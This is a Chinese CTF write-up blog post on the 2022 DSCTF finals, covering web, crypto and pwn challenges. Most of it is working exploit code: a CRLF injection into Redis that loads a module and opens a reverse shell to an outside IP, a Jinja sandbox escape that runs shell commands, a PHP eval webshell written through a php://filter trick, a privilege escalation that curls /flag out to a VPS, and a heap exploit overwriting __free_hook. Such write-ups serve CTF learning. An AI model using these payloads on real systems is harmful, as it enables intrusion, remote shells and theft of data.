【2022 DSCTF决赛wp】

最新推荐文章于 2024-05-17 00:00:22 发布
最新推荐文章于 2024-05-17 00:00:22 发布
阅读量845 收藏 2
点赞数 1
分类专栏: CTF-Writeup 文章标签: web安全 安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45603443/article/details/126143069
版权

2022 DSCTF决赛wp

Web

ezjava

扫⽬录 /actuator/heapdump 找到redis密码
在这里插入图片描述
在这里插入图片描述
注册个⽤户 登录 有jwt就可以过过滤器 然后就可以ssrf了 客户端是jodd-http

https://github.com/oblac/jodd-http/issues/9

CRLF打Redis主从复制
exp

import urllib.parse
url = '''http://127.0.0.1:6379/ HTTP/1.1\r\nHost: 127.0.0.1:6379\r\nAUTH
enw!BKT_hac*pev9nvj\r\nSLAVEOF 121.4.124.62 6666\r\nCONFIG SET dir /tmp\r\nconfig set
dbfilename exp.so\r\nMODULE LOAD /tmp/exp.so\r\nsystem.rev 121.4.124.62 9001\r\nSLAVEOF
NO ONE\r\nquit\r\nPOST / '''
print(urllib.parse.quote(url))

在这里插入图片描述
在这里插入图片描述

newweb_new

nghttp http://39.106.156.96:48097/ -v

在这里插入图片描述
访问路径405 改成post传参 沙箱逃逸 过滤单双引号 ⽤request

POST /sup3rh1dep4th/?
x1=__class__&x2=__base__&x3=__subclasses__&x4=__getitem__&x5=__init__&x6=__globals__&x7
=__builtins__&x8=eval&x9=__import__("os").popen('cat%20/f*').read() HTTP/2
Host: 39.106.156.96:48097
Content-Length: 241
Content-Type: application/x-www-form-urlencoded
data=()|attr(request.args.x1)|attr(request.args.x2)|attr(request.args.x3)
()|attr(request.args.x4)
(280)|attr(request.args.x5)|attr(request.args.x6)|attr(request.args.x4)
(request.args.x7)|attr(request.args.x4)(request.args.x8)(request.args.x9)

在这里插入图片描述

safe_script_new

在这里插入图片描述
在对象销毁的时候会触发save操作 file_put_contents写⼊⽂件 ⽂件名可控 往上找就是\SESSION::__construct。
在这里插入图片描述
有过滤 限制了… 不能相对路径⽬录穿越 同时限制了file:// 以及第⼀字符不能是/ 绕过也很简单 使⽤php伪协议就⾏ 这⾥使⽤了utf7到utf8的转化器
payload

POST / HTTP/1.1
Host: 39.107.68.209:36319
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101
Firefox/103.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: sessid=php://filter/convert.iconv.utf-7.utf-8/resource=/var/www/html/1.php
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 105
key=%2BADw%3Fphp%20%2BAEA%2Deval%28%2BACQAXw%2DPOST%2BAFs%2D1%2BAF0%29%2BADs%20%20%3F%2
BAD4APQ&value=aaaa

蚁剑连接1.php 根⽬录看到/strat.sh,内容如下:
在这里插入图片描述
查看进程是⽤root权限启动的在这里插入图片描述
run.py内容

import subprocess
import re
import os
import time
def get_version(program):
pid = program[1]
try:
exe_path = "/proc/" + pid + "/exe"
program_path = subprocess.check_output(["su","-l",program[0],"-
s",'/bin/bash','-c',f"readlink {exe_path}"], timeout=1).decode('utf-8').strip()
print(program, "/proc/" + pid + "/exe", program_path)
return subprocess.check_output([program_path, '--version'],
timeout=1).decode('utf-8').strip()
except Exception as e:
print(e)
return None
def get_process_list():
try:
process_list = []
raw = subprocess.check_output(['ps', '-ef']).decode('utf-8').strip()
 # raw = open("a.txt", "r").read()
lines = raw.split('\n')
for line in lines:
if line.startswith('UID'):
continue
data = re.findall(r'^([^\x20]+)\x20+([^\x20]+)\x20+([^\x20]+)\x20+
([^\x20]+)\x20+([^\x20]+)\x20+([^\x20]+)\x20+([^\x20]+)\x20+(.+?)$', line)
if len(data) > 0:
data = data[0]
else:
continue
print(data, data[-1])
if "java" in data[-1]:
process_list.append(data)
return process_list
except subprocess.CalledProcessError:
return None
if __name__ == '__main__':
while True:
try:
processes = get_process_list()
for process in processes:
get_version(process)
except:
pass
time.sleep(20)

⼤概意思是每隔20秒取含有java的进程,先⽤readlink查看链接信息,然后执⾏ --version flag在根⽬录下,那么就写个读/flag后curl发到vps的elf,并且命名为java就能让run.py以root来读flag了 写⼊1.c。

#include <stdlib.h>
int main(int argc, char* argv[]) {
for(int i = 0; i < 1000; i++){
system("curl http://<vps_ip>:4040/?flag=`cat /flag`");
system("sleep 3");
 }
}

接着编译⽣成,-o执⾏程序名为java,然后赋予权限启动在这里插入图片描述
等待⼀下就拿到flag在这里插入图片描述

Misc

Esc@pE_ASt_Reverge_d

在这里插入图片描述

Crypto

tomic

sage⽤筛法分解第⼀个,第⼆个直接gcd

from sage.all import *
from pwn import *
context.log_level='debug'
r=remote('39.106.156.96',36510)
r.recvuntil('Factor ')
n=int(r.recvline().strip()[:-1])
factors=qsieve(n)[0]
p,q=[int(i) for i in factors]
r.sendline(str(p+q))
r.recvuntil(' - ')
n=int(r.recvuntil(' - ')[:-3])
e=int(r.recvuntil(':')[:-1])
p=GCD(n,e)
q=n//p
r.sendline(str(p+q))
r.interactive()

Pwn

gonote_new

#coding:utf-8
import sys
from pwn import *
context.log_level='debug'
#context.arch='amd64'
while True :
 # try :
 if len(sys.argv)==1 :
 io=process('./gonote')
 # io=process(['./'],env={'LD_PRELOAD':'./'})
 elf=ELF('./gonote')
 libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
 ld = ELF('/lib/x86_64-linux-gnu/ld-2.27.so')
 pop_rdx_rsi=0x00000000001306d9 #: pop rdx ; pop rsi ; ret
 one_gadget = [0x4f2c5,0x4f322,0x10a38c]
 else :
 io=remote('39.107.82.169',9110)
 elf=ELF('./gonote')
 libc=ELF('./libc-2.27.so')
 pop_rdx_rsi=0x00000000001306d9 #: pop rdx ; pop rsi ; ret
 one_gadget = [0x4f2c5,0x4f322,0x10a38c]
 def add(a,b,c):
 io.sendlineafter('Your choice: ','1')
 io.sendlineafter('Index: ',str(a))
 io.sendlineafter('Size: ',str(b))
 io.sendafter('Content: ',c)
 def show(a):
 io.sendlineafter('Your choice: ','2')
 io.sendlineafter('Index: ',str(a))
 def delete(a):
 io.sendlineafter('Your choice: ','3')
io.sendlineafter('Index: ',str(a))
 
 add(2,-0xff88,'a')
 add(0,0x1f8,'a'*0xf7+'\n')
 add(1,0x1f8,'a'*0xf7+'\n')
 add(3,0x1f8,'a'*0xf7+'\n')
 add(4,0xf8,'/bin/sh\x00')
 add(5,0x1f8,'a'*0xf7+'\n')
 delete(2)
 add(2,-0xff88,'\x00'*0x70+p64(0)+p64(0x601))
 delete(0)
 add(0,0x1f8,'a'*0xf7+'\n')
 show(1)
 libc_base=u64(io.recvuntil('\x7f')[-6:]+'\x00\x00')-libc.sym['__malloc_hook']-96-
0x10
 libc.address=libc_base
 bin_sh_addr=libc.search('/bin/sh\x00').next()
 system_addr=libc.sym['system']
 delete(5)
 delete(3)
 add(3,0xf8,'a'*0xf7+'\n')
 add(5,0x188,'a'*0xf8+p64(0x1f8)+p64(libc.sym['__free_hook']))
 add(6,0x1f8,'a'*0xf7+'\n')
 add(7,0x1f8,p64(system_addr))
 delete(4)
 # success('libc_base:'+hex(libc_base))
 # gdb.attach(io)
 # pause()
 io.interactive()
 # except Exception as e:
 # io.close()
 # continue
 # else:
 # continue

Tip

EDI安全的CTF战队经常参与各大CTF比赛,了解CTF赛事。
欢迎各位师傅加入EDI,大家一起打CTF,一起进步。(诚招re crypto pwn misc方向的师傅)
你的加入可以给我们带来新的活力,我们同样也可以赠你无限的发展空间。
有意向的师傅请联系邮箱root@edisec.net、shiyi@edisec.net(带上自己的简历,简历内容包括自己的学习方向,学习经历等)

EDI安全
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DASCTF2022十月挑战赛部分WP
东隅的博客
10-25 1302
DASCTF2022十月挑战赛部分WP.看题目源码,有4个类,开始的时候看到了fine类里面的call_user_func,最终应该是打进这个地方,另外看到了 secret_code 类里面的hint()函数,所以我的想法路线是先想办法调用出这个hint()函数,然后根据给出的hint进入那个call_user_func,然后就开始找链子,但是最终hint()函数给出的东西真是让我摸不到头脑,就只好不管这个hint直接打进call_user_func进行rce了。
2022 DSCTF首届数字空间安全攻防大赛
qq_53263789的博客
07-17 831
2022-DSCTF-web
ctf_show笔记篇(web入门---SSRF)
whale_waves的博客
04-04 786
ssrf产生原理: 服务端存在网络请求功能/函数,例如:file_get_contens()这一类类似于curl 这种函数传入的参数用户是可控的 没有对用户输入做过滤导致的ssrf漏洞 ssrf利用: 用于探测内网服务以及端口 探针存活主机以及开放服务 探针是否存在redis服务(未授权访问, 相当于是可以访问到redis服务并且开发人员不严谨没有设置密码, 因为默认是没有密码的, 或者说开发者设置了密码但是是弱口令), 利用定时任务反弹shell
DSCTF pwn 部分wp
N1rvana的博客
07-15 622
DSCTF pwn wp
DSCTF2022 fuzzerinstrospector-Wp
m0_46329041的博客
07-17 264
由于这题的libc版本是2.27的,存在tcache,题目限制了最多申请9个chunk,所以,申请9个并释放,填满tcache后,剩下的chunk由于大于fastbin的size,会进入unsortedbin,这样就可以通过该chunk的fd指针泄露出main_arena,从而计算得到libc,然后再计算出system的地址,并向chunk写入。BitMap是一种算法,在数据量特别大时,可以很好的缩减时间复杂度,通过在对应位置填上对应的值,来表明该位置代表的数字,是否存在。,并调用6号选项即可。......
d^3CTF web部分wp
fmyyy1的博客
03-07 1052
d3oj 提示是尝试用oct用户登陆,翻组件版本看到个合适的 https://hackerone.com/reports/869574 编辑文章哪里很明显 POST /article/0/edit HTTP/1.1 Host: xxx User-Agent: xx Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0
ISCC2022题目附件
06-06
2022ISCC所有题目附件,包含ISCC2022-练武题附件和ISCC2022-擂台题附件 信息安全已涉及到国家政治、经济、文化、社会和生态文明的建设,信息系统越发展到它的高级阶段,人们对其依赖性就越强,从某种程度上讲其越...
Wp.rar_wp
09-14
简单实用的butterworth滤波器设计,很好用
wp实现一键锁屏功能
04-04
WP8的时候,关于如何关闭屏幕,国内外都有不少文章了,大家有兴趣地可以搜搜,很多,我就不给链接了,因为稍后我的例子中会有。 其实,关闭屏幕是调用了未开放的API,正因为这个API未开放的,不敢保证所有机型都能...
封面应用WP7
04-02
这是封面应用WP7源码,也是Windows Phone 7封面应的一个实例,可以实现项目演示影片效果,和一些书籍等封面效果,该界面不但可以实现左右滚动,而且效果很不错,喜欢wp开发的朋友可以下载学习一下。
mingyue.exe wp
03-08
mingyue.exe wp
[BDSec CTF 2022] 部分WP
weixin_52640415的博客
07-22 1816
BDSEC CTF 2022
ISCTF2022部分WP
y2xsec的博客
11-04 2284
ISCTF2022部分WP
UNCTF2022 wp Misc magic_word
⚪褶
11-27 218
unctf2022 比赛的一篇wp
2022年暑期CTF刷题WP(停止更新)
qq_52820087的博客
06-19 3506
2022年暑期CTF刷题之路
SUSCTF2022 misc wp
wha1e的博客
02-28 2762
SUSCTF2022misc
NISACTF 2022 MISC 部分WP
qq_51447967的博客
04-28 2045
[NISACTF 2022]bilala的二维码 题目提示如下 bilala说,里面会不会还藏着什么东西呢,图片分辨率好像有用诶,压缩包密码好像和战队名字相关 下载得到一张缺少定位符号的二维码,手动补全,然后扫描。 扫描得到一个URL,如下 https://video.gz2.com.cn/h666G/h666G_kzwIVy 进去下载得到一张图片,如下 对图片进行分析 可以看到第一张图片后面又附加了一张图片,然后第二张图片后面有个压缩包,全部提取出来。 看了下图片没有发现什么,然后去分析压
ciscn 2022 misc 部分wp
zx66661的博客
05-30 1022
everlasting_night 提示是注意png数据块 然后注意图片通道数据可以用来lsb解码 下载是一张图片,尝试几种方法之后没有太大发现 得到提示于是看了一下stegsolve f78dcd383f1b574b 这里发现了一串可疑字符串,题目提示,可以配合lsb隐写,用lsb脚本运行解密 在这里说一句,cloacked-pixel-master要用python2来使用 要下好几个库,慢慢百度吧 Python2 lsb.py extract 图片位置 解出来的位置 密码
CTF网络安全大赛简单web题目:eval
最新发布
Pythonit教程网
05-17 1099
(错误控制运算符)等可能引发安全问题的函数。这个PHP脚本有几个关键部分,但首先,它是不安全的,因为使用了。红客网:blog.hongkewang.cn。只需要在web的url后面加上参数“题目来源于:bugku。一道简单web的题目。
强网杯 2022 谍影重重wp
12-18
强网杯2022谍影重重WP是我国一项网络安全竞赛中的一个题目解答。这道题目主要涉及隐写和密码学方面的知识,要求选手解析一段加密信息,并还原出明文信息。 解题过程如下: 首先,选手会得到一段看似普通的文本,但其中隐藏着隐藏着几个不同类型的隐藏信息。选手需要借助隐写分析工具,例如StegSolve,来分析图像中是否含有LSB隐写、色彩分量隐写等信息。此外,选手还要注意文字中是否有使用不常见的Unicode字符来隐藏信息。 在找到隐写信息后,接下来是解密密码学部分。选手需要根据提示,使用正确的解密方法对隐藏信息进行还原。可能涉及到的密码学算法有:凯撒密码、栅栏密码、维吉尼亚密码等。需要选手根据密钥或者加密规则,反推出正确的解密方法,并对隐藏信息进行解码。 通过以上步骤,选手最终可以得到明文信息,也就是这道题目的答案。 这道题目整体难度较高,需要选手具备扎实的密码学和隐写学知识,并具有分析和解决问题的能力。参赛选手需要细心观察、耐心分析,才能顺利解答出这个谜题。同时,这道题目也展示了网络安全竞赛中的一种常见挑战方式,旨在培养选手的思维敏捷性和解决复杂问题的能力。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值